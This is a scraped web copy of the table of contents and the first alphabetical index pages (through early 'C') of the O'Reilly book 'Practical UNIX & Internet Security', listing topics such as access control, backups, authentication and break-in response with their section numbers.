18.12.2012 Views

O'Reilly - Practical UNIX & Internet Sec... 7015KB

O'Reilly - Practical UNIX & Internet Sec... 7015KB

O'Reilly - Practical UNIX & Internet Sec... 7015KB

SHOW MORE
SHOW LESS

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

<strong>Practical</strong> <strong>UNIX</strong> & <strong>Internet</strong> <strong>Sec</strong>urity<br />

By Simson Garfinkel & Gene Spafford; ISBN 1-56592-148-8, 1004 pages.<br />

<strong>Sec</strong>ond Edition, April 1996.<br />

(See the catalog page for this book.)<br />

Search the text of <strong>Practical</strong> <strong>UNIX</strong> & <strong>Internet</strong> <strong>Sec</strong>urity.<br />

Index<br />

Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Table of Contents<br />

Preface<br />

Part I: Computer <strong>Sec</strong>urity Basics<br />

Chapter 1: Introduction<br />

Chapter 2: Policies and Guidelines<br />

Part II: User Responsibilities<br />

Chapter 3: Users and Passwords<br />

Chapter 4: Users, Groups, and the Superuser<br />

Chapter 5: The <strong>UNIX</strong> Filesystem<br />

Chapter 6: Cryptography<br />

Part III: System <strong>Sec</strong>urity<br />

Chapter 7: Backups<br />

Chapter 8: Defending Your Accounts<br />

Chapter 9: Integrity Management<br />

Chapter 10: Auditing and Logging<br />

Chapter 11: Protecting Against Programmed Threats<br />

Chapter 12: Physical <strong>Sec</strong>urity<br />

Chapter 13: Personnel <strong>Sec</strong>urity<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index.htm (1 of 2) [2002-04-12 10:43:38]


<strong>Practical</strong> <strong>UNIX</strong> & <strong>Internet</strong> <strong>Sec</strong>urity<br />

Part IV: Network and <strong>Internet</strong> <strong>Sec</strong>urity<br />

Chapter 14: Telephone <strong>Sec</strong>urity<br />

Chapter 15: UUCP<br />

Chapter 16: TCP/IP Networks<br />

Chapter 17: TCP/IP Services<br />

Chapter 18: WWW <strong>Sec</strong>urity<br />

Chapter 19: RPC, NIS, NIS+, and Kerberos<br />

Chapter 20: NFS<br />

Part V: Advanced Topics<br />

Chapter 21: Firewalls<br />

Chapter 22: Wrappers and Proxies<br />

Chapter 23: Writing <strong>Sec</strong>ure SUID and Network Programs<br />

Part VI: Handling <strong>Sec</strong>urity Incidents<br />

Chapter 24: Discovering a Break-in<br />

Chapter 25: Denial of Service Attacks and Solutions<br />

Chapter 26: Computer <strong>Sec</strong>urity and U.S. Law<br />

Chapter 27: Who Do You Trust?<br />

Part VII: Appendixes<br />

Appendix A: <strong>UNIX</strong> <strong>Sec</strong>urity Checklist<br />

Appendix B: Important Files<br />

Appendix C: <strong>UNIX</strong> Processes<br />

Appendix D: Paper Sources<br />

Appendix E: Electronic Resources<br />

Appendix F: Organizations<br />

Appendix G: Table of IP Services<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates. All Rights Reserved.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index.htm (2 of 2) [2002-04-12 10:43:38]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: Symbols and Numbers<br />

10BaseT networks<br />

12.3.1.2. Eavesdropping by Ethernet and 10Base-T<br />

16.1. Networking<br />

8mm video tape : 7.1.4. Guarding Against Media Failure<br />

@ (at sign)<br />

with chacl command : 5.2.5.2. HP-UX access control lists<br />

in xhost list : 17.3.21.3. The xhost facility<br />

! and mail command : 15.1.3. mail Command<br />

. (dot) directory : 5.1.1. Directories<br />

.. (dot-dot) directory : 5.1.1. Directories<br />

# (hash mark), disabling services with : 17.3. Primary <strong>UNIX</strong> Network Services<br />

+ (plus sign)<br />

in hosts.equiv file : 17.3.18.5. Searching for .rhosts files<br />

in NIS<br />

19.4. Sun's Network Information Service (NIS)<br />

19.4.4.6. NIS is confused about "+"<br />

/ (slash)<br />

IFS separator : 11.5.1.2. IFS attacks<br />

root directory<br />

5.1.1. Directories<br />

(see also root directory)<br />

~ (tilde)<br />

in automatic backups : 18.2.3.5. Beware stray CGI scripts<br />

for home directory : 11.5.1.3. $HOME attacks<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_0.htm (1 of 2) [2002-04-12 10:43:39]


Index<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_0.htm (2 of 2) [2002-04-12 10:43:39]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: A<br />

absolute pathnames : 5.1.3. Current Directory and Paths<br />

access<br />

/etc/exports file : 20.2.1.1. /etc/exports<br />

levels, NIS+ : 19.5.4. Using NIS+<br />

by non-citizens : 26.4.1. Munitions Export<br />

tradition of open : 1.4.1. Expectations<br />

via Web : 18.2.2.2. Additional configuration issues<br />

access control : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

ACLs<br />

5.2.5. Access Control Lists<br />

5.2.5.2. HP-UX access control lists<br />

17.3.13. Network News Transport Protocol (NNTP) (TCP Port 119)<br />

anonymous FTP : 17.3.2.1. Using anonymous FTP<br />

<strong>Internet</strong> servers : 17.2. Controlling Access to Servers<br />

monitoring employee access : 13.2.4. Auditing Access<br />

physical : 12.2.3. Physical Access<br />

restricted filesystems<br />

8.1.5. Restricted Filesystem<br />

8.1.5.2. Checking new software<br />

restricting data availability : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

USERFILE (UUCP)<br />

15.4.1. USERFILE: Providing Remote File Access<br />

15.4.2.1. Some bad examples<br />

Web server files<br />

18.3. Controlling Access to Files on Your Server<br />

18.3.3. Setting Up Web Users and Passwords<br />

X Window System<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_a.htm (1 of 8) [2002-04-12 10:43:40]


Index<br />

17.3.21.2. X security<br />

17.3.21.3. The xhost facility<br />

access control lists : (see ACLs)<br />

access.conf file : 18.3.1. The access.conf and .htaccess Files<br />

access() : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

access_log file<br />

10.3.5. access_log Log File<br />

18.4.2. Eavesdropping Through Log Files<br />

with refer_log file : 18.4.2. Eavesdropping Through Log Files<br />

accidents<br />

12.2.2. Preventing Accidents<br />

(see also natural disasters)<br />

accounting process<br />

10.2. The acct/pacct Process Accounting File<br />

10.2.3. messages Log File<br />

(see also auditing)<br />

accounts : 3.1. Usernames<br />

aliases for : 8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

changing login shell<br />

8.4.2. Changing the Account's Login Shell<br />

8.7.1. Integrating One-time Passwords with <strong>UNIX</strong><br />

created by intruders : 24.4.1. New Accounts<br />

default : 8.1.2. Default Accounts<br />

defense checklist : A.1.1.7. Chapter 8: Defending Your Accounts<br />

dormant<br />

8.4. Managing Dormant Accounts<br />

8.4.3. Finding Dormant Accounts<br />

expiring old : 8.4.3. Finding Dormant Accounts<br />

group : 8.1.6. Group Accounts<br />

importing to NIS server<br />

19.4.1. Including or excluding specific accounts:<br />

Joes<br />

19.4.4.2. Using netgroups to limit the importing of accounts<br />

3.6.2. Smoking Joes<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_a.htm (2 of 8) [2002-04-12 10:43:40]


Index<br />

8.8.3.1. Joetest: a simple password cracker<br />

locking automatically : 3.3. Entering Your Password<br />

logging changes to : 10.7.2.1. Exception and activity reports<br />

multiple, same UID : 4.1.2. Multiple Accounts with the Same UID<br />

names for : (see usernames)<br />

restricted, with rsh : 8.1.4.5. How to set up a restricted account with rsh<br />

restricting FTP from : 17.3.2.5. Restricting FTP with the standard <strong>UNIX</strong> FTP server<br />

running single command : 8.1.3. Accounts That Run a Single Command<br />

without passwords : 8.1.1. Accounts Without Passwords<br />

acct file : 10.2. The acct/pacct Process Accounting File<br />

acctcom program<br />

10.2. The acct/pacct Process Accounting File<br />

10.2.2. Accounting with BSD<br />

ACEs : (see ACLs)<br />

ACK bit : 16.2.4.2. TCP<br />

acledit command : 5.2.5.1. AIX Access Control Lists<br />

aclget, aclput commands : 5.2.5.1. AIX Access Control Lists<br />

ACLs (access control lists)<br />

5.2.5. Access Control Lists<br />

5.2.5.2. HP-UX access control lists<br />

errors in : 5.2.5.1. AIX Access Control Lists<br />

NNTP with : 17.3.13. Network News Transport Protocol (NNTP) (TCP Port 119)<br />

ACM (Association for Computing Machinery) : F.1.1. Association for Computing Machinery (ACM)<br />

active FTP : 17.3.2.2. Passive vs. active FTP<br />

aculog file : 10.3.1. aculog File<br />

adaptive modems : (see modems)<br />

adb debugger<br />

19.3.1.3. Setting the window<br />

C.4. The kill Command<br />

add-on functionality : 1.4.3. Add-On Functionality Breeds Problems<br />

addresses<br />

CIDR : 16.2.1.3. CIDR addresses<br />

commands embedded in : 15.7. Early <strong>Sec</strong>urity Problems with UUCP<br />

<strong>Internet</strong><br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_a.htm (3 of 8) [2002-04-12 10:43:40]


Index<br />

16.2.1. <strong>Internet</strong> Addresses<br />

16.2.1.3. CIDR addresses<br />

IP : (see IP addresses)<br />

Adleman, Leonard<br />

6.4.2. Summary of Public Key Systems<br />

6.4.6. RSA and Public Key Cryptography<br />

.Admin directory : 10.3.4. uucp Log Files<br />

administration : (see system administration)<br />

adult material : 26.4.5. Pornography and Indecent Material<br />

Advanced Network & Services (ANS) : F.3.4.2. ANS customers<br />

AFCERT : F.3.4.41. U.S. Air Force<br />

aftpd server : 17.3.2.4. Setting up an FTP server<br />

agent (user) : 4.1. Users and Groups<br />

agent_log file : 18.4.2. Eavesdropping Through Log Files<br />

aging : (see expiring)<br />

air ducts : 12.2.3.2. Entrance through air ducts<br />

air filters : 12.2.1.3. Dust<br />

Air Force Computer Emergency Response Team (AFCERT) : F.3.4.41. U.S. Air Force<br />

AIX<br />

3.3. Entering Your Password<br />

8.7.1. Integrating One-time Passwords with <strong>UNIX</strong><br />

access control lists : 5.2.5.1. AIX Access Control Lists<br />

tftp access : 17.3.7. Trivial File Transfer Protocol (TFTP) (UDP Port 69)<br />

trusted path : 8.5.3.1. Trusted path<br />

alarms : (see detectors)<br />

aliases<br />

8.8.9. Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

11.1.2. Back Doors and Trap Doors<br />

11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

decode : 17.3.4.2. Using sendmail to receive email<br />

mail : 17.3.4. Simple Mail Transfer Protocol (SMTP) (TCP Port 25)<br />

aliases file : 11.5.3.3. /usr/lib/aliases, /etc/aliases, /etc/sendmail/aliases, aliases.dir, or aliases.pag<br />

AllowOverride option : 18.3.2. Commands Within the Block<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_a.htm (4 of 8) [2002-04-12 10:43:40]


Index<br />

American Society for Industrial <strong>Sec</strong>urity (ASIS) : F.1.2. American Society for Industrial <strong>Sec</strong>urity (ASIS)<br />

ancestor directories : 9.2.2.2. Ancestor directories<br />

ANI schemes : 14.6. Additional <strong>Sec</strong>urity for Modems<br />

animals : 12.2.1.7. Bugs (biological)<br />

anlpasswd package : 8.8.2. Constraining Passwords<br />

anon option for /etc/exports : 20.2.1.1. /etc/exports<br />

anonymous FTP<br />

4.1. Users and Groups<br />

17.3.2.1. Using anonymous FTP<br />

17.3.2.6. Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

and HTTP : 18.2.4.1. Beware mixing HTTP with anonymous FTP<br />

ANS (Advanced Network & Services, Inc.) : F.3.4.2. ANS customers<br />

ANSI C standards : 1.4.2. Software Quality<br />

answer mode : 14.3.1. Originate and Answer<br />

answer testing : 14.5.3.2. Answer testing<br />

answerback terminal mode : 11.1.4. Trojan Horses<br />

APOP option (POP) : 17.3.10. Post Office Protocol (POP) (TCP Ports 109 and 110)<br />

Apple CORES (Computer Response Squad) : F.3.4.3. Apple Computer worldwide R&D community<br />

Apple Macintosh, Web server on : 18.2. Running a <strong>Sec</strong>ure Server<br />

applets : 11.1.5. Viruses<br />

application-level encryption : 16.3.1. Link-level <strong>Sec</strong>urity<br />

applications, CGI : (see CGI, scripts)<br />

ar program : 7.4.2. Simple Archives<br />

architecture, room : 12.2.3. Physical Access<br />

archiving information<br />

7.1.1.1. A taxonomy of computer failures<br />

(see also logging)<br />

arguments, checking : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

ARPA (Advanced Research Projects Agency)<br />

1.3. History of <strong>UNIX</strong><br />

(see also <strong>UNIX</strong>, history of)<br />

ARPANET network : 16.1.1. The <strong>Internet</strong><br />

ASIS (American Society for Industrial <strong>Sec</strong>urity) : F.1.2. American Society for Industrial <strong>Sec</strong>urity (ASIS)<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_a.htm (5 of 8) [2002-04-12 10:43:40]


Index<br />

assert macro : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

assessing risks<br />

2.2. Risk Assessment<br />

2.2.2. Review Your Risks<br />

2.5.3. Final Words: Risk Management Means Common Sense<br />

assets, identifying : 2.2.1.1. Identifying assets<br />

ASSIST : F.3.4.42. U.S. Department of Defense<br />

Association for Computing Machinery (ACM) : F.1.1. Association for Computing Machinery (ACM)<br />

asymmetric key cryptography : 6.4. Common Cryptographic Algorithms<br />

asynchronous systems : 19.2. Sun's Remote Procedure Call (RPC)<br />

Asynchronous Transfer Mode (ATM) : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

at program<br />

11.5.3.4. The at program<br />

25.2.1.2. System overload attacks<br />

AT&T System V : (see System V <strong>UNIX</strong>)<br />

Athena : (see Kerberos system)<br />

atime<br />

5.1.2. Inodes<br />

5.1.5. File Times<br />

ATM (Asynchronous Transfer Mode) : 16.2. IPv4: The <strong>Internet</strong> Protocol Version 4<br />

attacks : (see threats)<br />

audio device : 23.8. Picking a Random Seed<br />

audit IDs<br />

4.3.3. Other IDs<br />

10.1. The Basic Log Files<br />

auditing<br />

10. Auditing and Logging<br />

(see also logging)<br />

C2 audit : 10.1. The Basic Log Files<br />

checklist for : A.1.1.9. Chapter 10: Auditing and Logging<br />

employee access : 13.2.4. Auditing Access<br />

login times : 10.1.1. lastlog File<br />

system activity : 2.1. Planning Your <strong>Sec</strong>urity Needs<br />

user activity : 4.1.2. Multiple Accounts with the Same UID<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_a.htm (6 of 8) [2002-04-12 10:43:40]


Index<br />

who is logged in<br />

10.1.2. utmp and wtmp Files<br />

10.1.2.1. su command and /etc/utmp and /var/adm/wtmp files<br />

AUTH_DES authentication : 19.2.2.3. AUTH_DES<br />

AUTH_KERB authentication : 19.2.2.4. AUTH_KERB<br />

AUTH_NONE authentication : 19.2.2.1. AUTH_NONE<br />

AUTH_<strong>UNIX</strong> authentication : 19.2.2.2. AUTH_<strong>UNIX</strong><br />

authd service : 23.3. Tips on Writing Network Programs<br />

authdes_win variable : 19.3.1.3. Setting the window<br />

authentication : 3.2.3. Authentication<br />

ID services : 16.3.3. Authentication<br />

Kerberos<br />

19.6.1. Kerberos Authentication<br />

19.6.1.4. Kerberos 4 vs. Kerberos 5<br />

of logins : 17.3.5. TACACS (UDP Port 49)<br />

message digests<br />

6.5.2. Using Message Digests<br />

9.2.3. Checksums and Signatures<br />

23.5.1. Use Message Digests for Storing Passwords<br />

NIS+ : 19.5.4. Using NIS+<br />

RPCs<br />

19.2.2. RPC Authentication<br />

19.2.2.4. AUTH_KERB<br />

<strong>Sec</strong>ure RPC : 19.3.1. <strong>Sec</strong>ure RPC Authentication<br />

security standard for : 2.4.2. Standards<br />

for Web use : 18.3.3. Setting Up Web Users and Passwords<br />

xhost facility : 17.3.21.3. The xhost facility<br />

authenticators : 3.1. Usernames<br />

AuthGroupFile option : 18.3.2. Commands Within the Block<br />

authors of programmed threats : 11.3. Authors<br />

AuthRealm option : 18.3.2. Commands Within the Block<br />

AuthType option : 18.3.2. Commands Within the Block<br />

AuthUserFile option : 18.3.2. Commands Within the Block<br />

Auto_Mounter table (NIS+) : 19.5.3. NIS+ Tables<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_a.htm (7 of 8) [2002-04-12 10:43:40]


Index<br />

autologout shell variable : 12.3.5.1. Built-in shell autologout<br />

Automated Systems Incident Response Capability (NASA) : F.3.4.24. NASA: NASA-wide<br />

automatic<br />

11.5.3. Abusing Automatic Mechanisms<br />

(see also at program; cron file)<br />

account lockout : 3.3. Entering Your Password<br />

backups system : 7.3.2. Building an Automatic Backup System<br />

cleanup scripts (UUCP) : 15.6.2. Automatic Execution of Cleanup Scripts<br />

directory listings (Web) : 18.2.2.2. Additional configuration issues<br />

disabling of dormant accounts : 8.4.3. Finding Dormant Accounts<br />

logging out : 12.3.5.1. Built-in shell autologout<br />

mechanisms, abusing<br />

11.5.3. Abusing Automatic Mechanisms<br />

11.5.3.6. Other files<br />

password generation : 8.8.4. Password Generators<br />

power cutoff : (see detectors)<br />

sprinkler systems : 12.2.1.1. Fire<br />

wtmp file pruning : 10.1.3.1. Pruning the wtmp file<br />

auxiliary (printer) ports : 12.3.1.4. Auxiliary ports on terminals<br />

awareness, security : (see security, user awareness of)<br />

awk scripts<br />

11.1.4. Trojan Horses<br />

11.5.1.2. IFS attacks<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_a.htm (8 of 8) [2002-04-12 10:43:40]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: B<br />

back doors<br />

2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

6.2.3. Cryptographic Strength<br />

11.1. Programmed Threats: Definitions<br />

11.1.2. Back Doors and Trap Doors<br />

11.5. Protecting Yourself<br />

27.1.2. Trusting Trust<br />

in MUDs and IRCs : 17.3.23. Other TCP Ports: MUDs and <strong>Internet</strong> Relay Chat (IRC)<br />

background checks, employee : 13.1. Background Checks<br />

backquotes in CGI input<br />

18.2.3.2. Testing is not enough!<br />

18.2.3.3. Sending mail<br />

BACKSPACE key : 3.4. Changing Your Password<br />

backup program : 7.4.3. Specialized Backup Programs<br />

backups<br />

7. Backups<br />

7.4.7. inode Modification Times<br />

9.1.2. Read-only Filesystems<br />

24.2.2. What to Do When You Catch Somebody<br />

across networks : 7.4.5. Backups Across the Net<br />

for archiving information : 7.1.1.1. A taxonomy of computer failures<br />

automatic<br />

7.3.2. Building an Automatic Backup System<br />

18.2.3.5. Beware stray CGI scripts<br />

checklist for : A.1.1.6. Chapter 7: Backups<br />

criminal investigations and : 26.2.4. Hazards of Criminal Prosecution<br />

of critical files<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_b.htm (1 of 6) [2002-04-12 10:43:41]


Index<br />

bacteria<br />

7.3. Backing Up System Files<br />

7.3.2. Building an Automatic Backup System<br />

encrypting<br />

7.4.4. Encrypting Your Backups<br />

12.3.2.4. Backup encryption<br />

hardcopy : 24.5.1. Never Trust Anything Except Hardcopy<br />

keeping secure<br />

2.4.2. Standards<br />

2.4.3. Guidelines<br />

7.1.6. <strong>Sec</strong>urity for Backups<br />

7.1.6.3. Data security for backups<br />

26.2.6. Other Tips<br />

laws concerning : 7.1.7. Legal Issues<br />

of log files : 10.2.2. Accounting with BSD<br />

retention of<br />

7.1.5. How Long Should You Keep a Backup?<br />

7.2. Sample Backup Strategies<br />

7.2.5. Deciding upon a Backup Strategy<br />

rotating media : 7.1.3. Types of Backups<br />

software for<br />

7.4. Software for Backups<br />

7.4.7. inode Modification Times<br />

commercial : 7.4.6. Commercial Offerings<br />

special programs for : 7.4.3. Specialized Backup Programs<br />

strategies for<br />

7.2. Sample Backup Strategies<br />

7.2.5. Deciding upon a Backup Strategy<br />

10.8. Managing Log Files<br />

theft of<br />

12.3.2. Protecting Backups<br />

12.3.2.4. Backup encryption<br />

verifying : 12.3.2.1. Verify your backups<br />

zero-filled bytes in : 7.4. Software for Backups<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_b.htm (2 of 6) [2002-04-12 10:43:41]


Index<br />

11.1. Programmed Threats: Definitions<br />

11.1.7. Bacteria and Rabbits<br />

BADSU attempts : (see sulog file)<br />

Baldwin, Robert : 6.6.1.1. The crypt program<br />

bang (!) and mail command : 15.1.3. mail Command<br />

Bash shell (bsh) : 8.1.4.4. No restricted bash<br />

Basic Networking Utilities : (see BNU UUCP)<br />

bastion hosts : 21.1.3. Anatomy of a Firewall<br />

batch command : 25.2.1.2. System overload attacks<br />

batch jobs : (see cron file)<br />

baud : 14.1. Modems: Theory of Operation<br />

bell (in Swatch program) : 10.6.2. The Swatch Configuration File<br />

Bellcore : F.3.4.5. Bellcore<br />

Berkeley <strong>UNIX</strong> : (see BSD <strong>UNIX</strong>)<br />

Berkeley's sendmail : (see sendmail)<br />

bidirectionality<br />

14.1. Modems: Theory of Operation<br />

14.4.1. One-Way Phone Lines<br />

bigcrypt algorithm : 8.6.4. Crypt16() and Other Algorithms<br />

/bin directory<br />

11.1.5. Viruses<br />

11.5.1.1. PATH attacks<br />

backing up : 7.1.2. What Should You Back Up?<br />

/bin/csh : (see csh)<br />

/bin/ksh : (see ksh)<br />

/bin/login : (see login program)<br />

/bin/passwd : (see passwd command)<br />

/bin/sh : (see sh)<br />

in restricted filesystems : 8.1.5. Restricted Filesystem<br />

binary code : 11.1.5. Viruses<br />

bind system call<br />

16.2.6.1. DNS under <strong>UNIX</strong><br />

17.1.3. The /etc/inetd Program<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_b.htm (3 of 6) [2002-04-12 10:43:41]


Index<br />

biological threats : 12.2.1.7. Bugs (biological)<br />

block devices : 5.6. Device Files<br />

block send commands : 11.1.4. Trojan Horses<br />

blocking systems : 19.2. Sun's Remote Procedure Call (RPC)<br />

BNU UUCP<br />

15.5. <strong>Sec</strong>urity in BNU UUCP<br />

15.5.3. uucheck: Checking Your Permissions File<br />

Boeing CERT : F.3.4.5. Bellcore<br />

bogusns directive : 17.3.6.2. DNS nameserver attacks<br />

boot viruses : 11.1.5. Viruses<br />

Bootparams table (NIS+) : 19.5.3. NIS+ Tables<br />

Bourne shell<br />

C.5.3. Running the User's Shell<br />

(see also sh program; shells)<br />

(see sh)<br />

Bourne shell (sh) : C.5.3. Running the User's Shell<br />

bps (bits per second) : 14.1. Modems: Theory of Operation<br />

BREAK key : 14.5.3.2. Answer testing<br />

breakins<br />

checklist for : A.1.1.23. Chapter 24: Discovering a Break-in<br />

legal options following : 26.1. Legal Options After a Break-in<br />

responding to<br />

24. Discovering a Break-in<br />

24.7. Damage Control<br />

resuming operation after : 24.6. Resuming Operation<br />

broadcast storm : 25.3.2. Message Flooding<br />

browsers : (see Web browsers)<br />

BSD <strong>UNIX</strong><br />

Which <strong>UNIX</strong> System?<br />

1.3. History of <strong>UNIX</strong><br />

accounting with : 10.2.2. Accounting with BSD<br />

Fast Filesystem (FFS) : 25.2.2.6. Reserved space<br />

groups and : 4.1.3.3. Groups and BSD or SVR4 <strong>UNIX</strong><br />

immutable files : 9.1.1. Immutable and Append-Only Files<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_b.htm (4 of 6) [2002-04-12 10:43:41]


Index<br />

modems and : 14.5.1. Hooking Up a Modem to Your Computer<br />

programming references : D.1.11. <strong>UNIX</strong> Programming and System Administration<br />

ps command with : C.1.2.2. Listing processes with Berkeley-derived versions of <strong>UNIX</strong><br />

published resources for : D.1. <strong>UNIX</strong> <strong>Sec</strong>urity References<br />

restricted shells : 8.1.4.2. Restricted shells under Berkeley versions<br />

SUID files, list of : B.3. SUID and SGID Files<br />

sulog log under : 4.3.7.1. The sulog under Berkeley <strong>UNIX</strong><br />

utmp and wtmp files : 10.1.2. utmp and wtmp Files<br />

BSD/OS (operating system) : 1.3. History of <strong>UNIX</strong><br />

bsh (Bash shell) : 8.1.4.4. No restricted bash<br />

BSI/GISA : F.3.4.15. Germany: government institutions<br />

buffers<br />

checking boundaries : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

bugs<br />

for editors : 11.1.4. Trojan Horses<br />

1.1. What Is Computer <strong>Sec</strong>urity?<br />

1.4.2. Software Quality<br />

23.1.2.1. What they found<br />

27.2.3. Buggy Software<br />

27.2.5. <strong>Sec</strong>urity Bugs that Never Get Fixed<br />

Bugtraq mailing list : E.1.3.3. Bugtraq<br />

hacker challenges : 27.2.4. Hacker Challenges<br />

hardware : 27.2.1. Hardware Bugs<br />

.htaccess file : 18.3.1. The access.conf and .htaccess Files<br />

keeping secret : 2.5. The Problem with <strong>Sec</strong>urity Through Obscurity<br />

tips on avoiding : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

bugs (biological) : 12.2.1.7. Bugs (biological)<br />

bugs<br />

Preface<br />

(see also security holes)<br />

bulk erasers : 12.3.2.3. Sanitize your media before disposal<br />

byte-by-byte comparisons<br />

9.2.1. Comparison Copies<br />

9.2.1.3. rdist<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_b.htm (5 of 6) [2002-04-12 10:43:41]


Index<br />

bytes, zero-filled : 7.4. Software for Backups<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Copyright © 1999 <strong>O'Reilly</strong> & Associates, Inc. All Rights Reserved.<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_b.htm (6 of 6) [2002-04-12 10:43:41]


Index<br />

Search | Symbols | A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z<br />

Index: C<br />

C programming language<br />

1.3. History of <strong>UNIX</strong><br />

23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

-Wall compiler option : 23.2. Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

C shell : (see csh)<br />

C2 audit : 10.1. The Basic Log Files<br />

cables, network<br />

12.2.4.2. Network cables<br />

12.3.1.5. Fiber optic cable<br />

cutting : 25.1. Destructive Attacks<br />

tampering detectors for : 12.3.1.1. Wiretapping<br />

wiretapping : 12.3.1.1. Wiretapping<br />

cache, nameserver : 16.3.2. <strong>Sec</strong>urity and Nameservice<br />

caching : 5.6. Device Files<br />

Caesar Cipher : 6.4.3. ROT13: Great for Encoding Offensive Jokes<br />

calculating costs of losses : 2.3.1. The Cost of Loss<br />

call forwarding : 14.5.4. Physical Protection of Modems<br />

Call Trace : 24.2.4. Tracing a Connection<br />

CALLBACK= command : 15.5.2. Permissions Commands<br />

callbacks<br />

14.4.2.<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

BNU UUCP : 15.5.2. Permissions Commands<br />

Version 2 UUCP : 15.4.1.5. Requiring callback<br />

Caller-ID (CNID)<br />

14.4.3. Caller-ID (CNID)<br />

14.6. Additional <strong>Sec</strong>urity for Modems<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/index/idx_c.htm (1 of 12) [2002-04-12 10:43:42]


Index<br />

24.2.4. Tracing a Connection<br />

Canada, export control in : 6.7.2. Cryptography and Export Controls<br />

carbon monoxide : 12.2.1.2. Smoke<br />

caret (^) in encrypted messages : 6.2. What Is Encryption?<br />

case in usernames : 3.1. Usernames<br />

cat command<br />

3.2.2. The /etc/passwd File and Network Databases<br />

15.4.3. L.cmds: Providing Remote Command Execution<br />

-ve option : 5.5.4.1. The ncheck command<br />

-v option : 24.4.1.7. Hidden files and directories<br />

cat-passwd command : 3.2.2. The /etc/passwd File and Network Databases<br />

CBC (cipher block chaining)<br />

6.4.4.2. DES modes<br />

6.6.2. des: The Data Encryption Standard<br />

CBW (Crypt Breaker's Workbench) : 6.6.1.1. The crypt program<br />

CCTA IT <strong>Sec</strong>urity & Infrastructure Group : F.3.4.39. UK: other government departments and agencies<br />

CD-ROM : 9.1.2. Read-only Filesystems<br />

CDFs (context-dependent files)<br />

5.9.2. Context-Dependent Files<br />

24.4.1.7. Hidden files and directories<br />

ceilings, dropped : 12.2.3.1. Raised floors and dropped ceilings<br />

